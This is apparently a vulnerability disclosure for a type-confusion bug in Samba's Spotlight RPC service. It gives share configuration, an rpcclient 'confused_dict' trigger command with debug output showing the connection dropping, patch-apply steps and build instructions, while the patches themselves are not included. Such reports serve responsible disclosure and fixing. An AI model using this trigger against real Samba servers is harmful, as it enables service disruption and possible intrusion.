## Proof-Of-Concept

We extended the `rpcclient` CLI tool from the samba project own source code with the `confused_dict` command to allow us to send a dictionary that would leak to a Type Confusion.

### Configuration

1. Create the directory for the share: `mkdir ~/sambashare`
2. Setup a new samba share in `/etc/samba/smb.conf`:

```ini
# [...]

[sambashare]
    comment = Samba on KUDU
    path = /home/user/sambashare
    read only = no
    browsable = yes
    guest ok = yes

```

 3. We also suppose that an user named `user` with the password `user` was created beforehand and that this user is allowed to access the share `sambashare`.
 
### Usage

 
```bash
bin/rpcclient -U 'user' --password=user 'ncacn_np:localhost[\pipe\mdssvc]' -c "confused_dict sambashare /tmp"
Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
[DEBUG] Got an handle!
[DEBUG] command name added!
[DEBUG] sl_dict_t created!
[DEBUG] Dictionary built!
DALLOC_CTX(#1): {
        sl_array_t(#2): {
                sl_array_t(#3): {
                        string: openQueryWithParams:forContext:
                        uint64_t: 0xdeadbeef
                        uint64_t: 0xcafebabe
                }
                sl_dict_t(#4): {
                        string: kMDQueryString
                        string: *
                        string: kMDScopeArray
                        string: AAAABBBB
                }
        }
}

dcerpc_mdssvc_cmd failed: NT_STATUS_CONNECTION_DISCONNECTED
result was NT_STATUS_CONNECTION_DISCONNECTED
```

### Patch

A serie of two patches was applied against the master branch, commit: 01cdc5e00be78a51f0766634cc7fe50de2088203.

```bash
> git clone https://gitlab.com/samba-team/samba.git
> cd samba
> git apply 0001-add-the-raw_blob-command-for-the-Spotlight-RPC-in-rp.patch
> git apply 0002-add-confused_dict-command-to-rpcclient-to-trigger-th.patch
```

The patches are attached to this report.

## Build instruction

On [Ubuntu 22.10](https://wiki.samba.org/index.php/Package_Dependencies_Required_to_Build_Samba#Debian_/_Ubuntu)

```bash
> apt-get install acl attr autoconf bind9utils bison build-essential \
  debhelper dnsutils docbook-xml docbook-xsl flex gdb libjansson-dev krb5-user \
  libacl1-dev libaio-dev libarchive-dev libattr1-dev libblkid-dev libbsd-dev \
  libcap-dev libcups2-dev libgnutls28-dev libgpgme-dev libjson-perl \
  libldap2-dev libncurses5-dev libpam0g-dev libparse-yapp-perl \
  libpopt-dev libreadline-dev nettle-dev perl perl-modules pkg-config \
  python-all-dev python-crypto python-dbg python-dev python-dnspython \
  python3-dnspython python-gpgme python3-gpgme python-markdown python3-markdown \
  python3-dev xsltproc zlib1g-dev liblmdb-dev lmdb-utils
> ./configure --enable-debug
> make -j
```